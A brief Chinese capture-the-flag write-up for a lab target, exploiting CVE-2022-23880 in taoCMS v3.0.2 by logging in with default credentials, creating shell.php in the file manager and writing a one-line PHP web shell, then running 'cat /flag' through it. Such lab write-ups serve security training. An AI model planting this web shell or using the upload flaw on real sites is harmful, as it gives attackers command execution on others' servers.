春秋云镜 CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞
靶标介绍
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码;同CVE-2022-25578一套cms。
启动场景
漏洞利用
taoCMS默认账号admin/tao(管理后台F12查看源代码)
文件管理处存在任意文件上传漏洞,进入文件管理,新建shell.php文件。
编辑shell.php文件,写入一句话木马文件。
<?php
system($_GET[cmd]);
?>
http://eci-2zeiv4aug0u8eexs6yqa.cloudeci1.ichunqiu.com/shell.php?cmd=cat /flag
得到flag
flag{dabdb0aa-e457-4efc-a408-4e34ac5e098b}